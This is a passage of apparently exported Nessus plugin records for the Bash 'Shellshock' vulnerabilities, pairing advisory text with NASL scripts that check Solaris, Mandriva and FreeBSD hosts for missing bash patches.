\"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) 
(Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the\n vulnerability that is still present after the incorrect\n fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271,\n CVE-2014-7169, and CVE-2014-6277. 
(CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have unknown\n other impact via a crafted environment, as demonstrated\n by vectors involving the ForceCommand feature in OpenSSH\n sshd, the mod_cgi and mod_cgid modules in the Apache\n HTTP Server, scripts executed by unspecified DHCP\n clients, and other situations in which setting the\n environment occurs across a privilege boundary from Bash\n execution. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have unspecified other\n impact via crafted use of here documents, aka the\n 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in\n parse.y in GNU Bash through 4.3 bash43-026 allows remote\n attackers to cause a denial of service (out-of-bounds\n array access and application crash) or possibly have\n unspecified other impact via deeply nested for loops,\n aka the 'word_lineno' issue. 
(CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e15b61cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11.2.2.8.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^bash$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.2.0.8.0\", sru:\"SRU 11.2.2.8.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:25:55", "description": "Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other pieces of software and should be considered highly critical. Please refer to the RedHat Knowledge Base article and blog post for more information.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. 
An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further mitigates ShellShock-type vulnerabilities. Two such issues have already been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes introduced by the latest patch, caused by adding prefixes and suffixes to the variable names used for exporting functions. Note that the RedHat article mentions these variable names will have parentheses '()' at the end of their names, however, the latest upstream patch uses two percent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed in this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package immediately.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2015:164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-164.NASL", "href": "https://www.tenable.com/plugins/nessus/82417", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:164. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82417);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"MDVSA\", value:\"2015:164\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2015:164)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue\n(CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other\npieces of software and should be considered highly critical. Please\nrefer to the RedHat Knowledge Base article and blog post for more\ninformation.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further\nmitigates ShellShock-type vulnerabilities. Two such issues have\nalready been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes introduced\nby the latest patch, caused by adding prefixes and suffixes to the\nvariable names used for exporting functions. Note that the RedHat\narticle mentions these variable names will have parentheses '()' at\nthe end of their names, however, the latest upstream patch uses two\npercent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed\nin this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package\nimmediately.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0388.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0393.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-4.2-53.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-doc-4.2-53.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-04-28T15:57:46", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. 
(CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the 'word_lineno' issue. 
(CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2016-02-02T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.2", "p-cpe:/a:oracle:solaris:bash"], "id": "SOLARIS11_BASH_20141031_2.NASL", "href": "https://www.tenable.com/plugins/nessus/88514", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88514);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 
mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the\n vulnerability that is still present after the incorrect\n fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code or cause a denial of service\n (uninitialized memory access, and untrusted-pointer read\n and write operations) via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271\n and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271,\n CVE-2014-7169, and CVE-2014-6277. 
(CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have unknown\n other impact via a crafted environment, as demonstrated\n by vectors involving the ForceCommand feature in OpenSSH\n sshd, the mod_cgi and mod_cgid modules in the Apache\n HTTP Server, scripts executed by unspecified DHCP\n clients, and other situations in which setting the\n environment occurs across a privilege boundary from Bash\n execution. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have unspecified other\n impact via crafted use of here documents, aka the\n 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in\n parse.y in GNU Bash through 4.3 bash43-026 allows remote\n attackers to cause a denial of service (out-of-bounds\n array access and application crash) or possibly have\n unspecified other impact via deeply nested for loops,\n aka the 'word_lineno' issue. 
(CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e15b61cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11.2.5.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^bash$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.5.0.5.0\", sru:\"SRU 11.2.5.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:36", "description": "Best Practical reports :\n\nRT 4.2.0 and above may be vulnerable to arbitrary execution of code by way of CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, or CVE-2014-6271 -- collectively known as 'Shellshock.' This vulnerability requires a privileged user with access to an RT instance running with SMIME integration enabled; it applies to both mod_perl and fastcgi deployments. If you have already taken upgrades to bash to resolve 'Shellshock,' you are protected from this vulnerability in RT, and there is no need to apply this patch. 
This vulnerability has been assigned CVE-2014-7227.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-03T00:00:00", "type": "nessus", "title": "FreeBSD : rt42 -- vulnerabilities related to shellshock (81e2b308-4a6c-11e4-b711-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187", "CVE-2014-7227"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rt42", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/78039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78039);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"FreeBSD : rt42 -- vulnerabilities related to shellshock (81e2b308-4a6c-11e4-b711-6805ca0b3d42)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Best Practical reports :\n\nRT 4.2.0 and above may be vulnerable to arbitrary execution of code by\nway of CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, or\nCVE-2014-6271 -- collectively known as 'Shellshock.' This\nvulnerability requires a privileged user with access to an RT instance\nrunning with SMIME integration enabled; it applies to both mod_perl\nand fastcgi deployments. If you have already taken upgrades to bash to\nresolve 'Shellshock,' you are protected from this vulnerability in RT,\nand there is no need to apply this patch. 
This vulnerability has been\nassigned CVE-2014-7227.\");\n # http://blog.bestpractical.com/2014/10/security-vulnerability-in-rt-42x-cve-2014-7227.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42ab1f4e\");\n # https://vuxml.freebsd.org/freebsd/81e2b308-4a6c-11e4-b711-6805ca0b3d42.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaee6eb3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rt42\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n 